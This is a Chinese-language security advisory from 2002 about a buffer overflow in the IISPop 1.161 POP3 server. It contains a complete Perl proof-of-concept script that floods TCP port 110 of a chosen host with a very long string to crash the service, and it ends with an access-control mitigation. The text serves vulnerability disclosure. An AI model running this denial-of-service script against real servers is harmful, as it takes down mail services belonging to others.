IISPop远程缓冲区溢出导致拒绝服务漏洞发布时间:2002-11-21 更新时间:2002-11-21 严重程度:高 威胁程度:远程拒绝服务 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:6183 受影响系统 Curtis Specialty Consulting IISPop 1.161详细描述 IISPop处理用户请求上存在缓冲区溢出漏洞,发送大量数据到IISPop的TCP/110端口会造成服务器程序内存访问错误,也存在执行任意命令的可能性。 测试代码 #!/usr/bin/perl -w # tool : iispdos.pl # shutdown all version of IISPop # greetz crack.fr , marocit ,christal # use IO::Socket; $ARGC=@ARGV; if ($ARGC !=1) { print "\n-->"; print "\tUsage: perl iispdos.pl <host> \n"; exit; } $remo = $ARGV[0]; $buffer = "A" x 289999; print "\n-->"; print "\tconnection with $remo\n"; unless ($so = IO::Socket::INET->new (Proto => "TCP", PeerAddr => $remo, PeerPort => "110")) { print "-->"; print "\tConnection Failed...\n"; exit; } print $so "$buffer\n"; close $so; print "-->"; print "\tnow test if the distant host is down\n"; exit; 解决方案 目前厂商暂时不提供解决方案。建议对POP服务端口进行访问控制只对可信用户开放。 相关信息 securma massine <securma@caramail.com> |
